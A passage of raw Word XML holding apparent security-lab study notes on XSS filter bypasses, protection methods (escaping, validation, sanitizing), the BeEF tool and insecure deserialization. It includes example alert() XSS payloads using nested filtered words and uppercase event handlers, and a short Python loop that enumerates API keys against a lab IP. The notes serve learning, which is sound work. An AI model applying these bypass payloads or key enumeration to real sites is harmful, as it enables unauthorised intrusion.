    <w:p w14:paraId="0D749FD1" w14:textId="4091D628" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>replace onerror with onmouseover or onhover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D18B82" w14:textId="4186FA1B" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bypass filter of given words in actual payload, such as “Hello”, as used above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7235B0AD" w14:textId="366CFB66" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check filter code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF53A98" w14:textId="1D657B8F" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>often replace filtered word with “ “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5941EACC" w14:textId="58D048AD" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>place filtered word within filtered word, outer word will be removed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980F535" w14:textId="3582B606" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7640B">
        <w:t>&lt;img src="blah" onerror=alert("HHelloello") /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728DE369" w14:textId="228D1D83" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>replace onerror with onmouseover or onhover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB1DFDE" w14:textId="3305CAFD" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bypassing a specific list of terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00490A54" w14:textId="4556C3AC" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try different variations, such as all uppercase of a word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D65CB" w14:textId="5B7E8390" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. if onerror is filtered, try ONERROR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A0FDE" w14:textId="2EB8B295" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7640B">
        <w:t>&lt;img src="blah" ONMOUSEOVER="alert('HHelloello')" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA7C9E1" w14:textId="7666C34A" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00E7640B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Protection Methods and Other Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5EDE80" w14:textId="65FAD8B9" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Protection Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14046B" w14:textId="021E7318" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Escaping – escape all user input – any data application receives is secure before rendering it for end users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65320674" w14:textId="2475063D" w:rsidR="00E7640B" w:rsidRDefault="00E7640B" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>key characters in data received by web page will be prevented from being interpreted in any malicious ways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D29C1" w14:textId="1C297E1A" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>discarding &lt;&gt; characters from being renders for example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED77BC4" w14:textId="7ADECCE7" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Validating Input – ensuring application is rendering correct data and preventing malicious data from doing harm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5067B3AD" w14:textId="0A04D130" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>disallowing certain characters from being submitted in the first place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D9C6F9" w14:textId="10A8FD5E" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sanitizing – helpful on sites that allow HTML markup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0CCBE0" w14:textId="26D0D616" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>changing unacceptable user input into an acceptable format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B1C3FD" w14:textId="25C0F82C" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>changing &lt; character into HTML entity &amp;#60;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD81BA" w14:textId="2C174D50" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Other Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FDB89A" w14:textId="5DAA5896" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>BeEF tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B156667" w14:textId="661D679C" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hook a browser via XSS and launch and control a range of different attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111CC9C8" w14:textId="4DD07097" w:rsidR="00C8609D" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>assess security posture of target environment by using client-side attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507C3389" w14:textId="619FD94E" w:rsidR="00C8609D" w:rsidRPr="00F512ED" w:rsidRDefault="00C8609D" w:rsidP="00C8609D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>XSS-Payloads.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B69E99B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>XSS Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3933BE78" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111ECF4C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Occurs when untrusted data is used to abuse the logic of an application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660357F2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Replacing data processed by an application with malicious code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2951C7BE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Leverages legitimate serialization and deserialization process used by web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41687BEC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Low exploitability – case-by-case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066D38A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Exploit extent dependent on hacker skill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE47EC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>What is vulnerable?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA0D0F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>E-commerce sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C400F8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Forums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278B3843" w14:textId="45AE2873" w:rsidR="00F626E7" w:rsidRDefault="00DC7D6C" w:rsidP="00F626E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105F9C9C" w14:textId="1230FC40" w:rsidR="00F626E7" w:rsidRDefault="00F626E7" w:rsidP="00F626E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for in web page source code for directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C49D214" w14:textId="2BD217F0" w:rsidR="00F626E7" w:rsidRDefault="00F626E7" w:rsidP="00F626E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>API Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3B41D" w14:textId="77777777" w:rsidR="00F626E7" w:rsidRPr="00F626E7" w:rsidRDefault="00F626E7" w:rsidP="00F626E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26E7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import requests </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B41A896" w14:textId="77777777" w:rsidR="00F626E7" w:rsidRPr="00F626E7" w:rsidRDefault="00F626E7" w:rsidP="00F626E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ED331F" w14:textId="77777777" w:rsidR="00F626E7" w:rsidRPr="00F626E7" w:rsidRDefault="00F626E7" w:rsidP="00F626E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26E7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>for api_key in range(1,100,2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CF01AE" w14:textId="77777777" w:rsidR="00F626E7" w:rsidRPr="00F626E7" w:rsidRDefault="00F626E7" w:rsidP="00F626E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26E7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("API Key ", api_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E804CC0" w14:textId="77777777" w:rsidR="00F626E7" w:rsidRPr="00F626E7" w:rsidRDefault="00F626E7" w:rsidP="00F626E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26E7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        html = requests.get(f'http://10.10.133.74:8000/api/{api_key}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D21BE" w14:textId="77777777" w:rsidR="00F626E7" w:rsidRPr="00F626E7" w:rsidRDefault="00F626E7" w:rsidP="00F626E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26E7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(html.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED1806" w14:textId="77777777" w:rsidR="00F626E7" w:rsidRPr="00F512ED" w:rsidRDefault="00F626E7" w:rsidP="00F626E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636CBC99" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Application runtimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C2926" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Insecure Deserialization – Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65138266" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>OOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387E7CF7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>States and behaviors of objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678CD782" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Insecure Deserialization – Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213496E1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
